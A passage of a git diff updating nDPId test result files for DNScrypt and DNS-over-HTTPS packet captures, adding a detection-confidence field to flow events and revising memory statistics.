+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00182{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","total-events-serialized":1588}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 608/488
@@ -1594,9 +1594,9 @@
 ~~ total active/idle flows...: 251/251
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4908981 bytes
-~~ total memory freed........: 4908981 bytes
-~~ total allocations/frees...: 100791/100791
+~~ total memory allocated....: 4911934 bytes
+~~ total memory freed........: 4911934 bytes
+~~ total allocations/frees...: 102381/102381
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 187 chars
 ~~ json string max len.......: 2426 chars
diff --git a/test/results/dnscrypt-v2-doh.pcap.out b/test/results/dnscrypt-v2-doh.pcap.out
index 8b50471eb..60fc72b4a 100644
--- a/test/results/dnscrypt-v2-doh.pcap.out
+++ b/test/results/dnscrypt-v2-doh.pcap.out
@@ -1,244 +1,244 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02285{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00832{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02360{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mP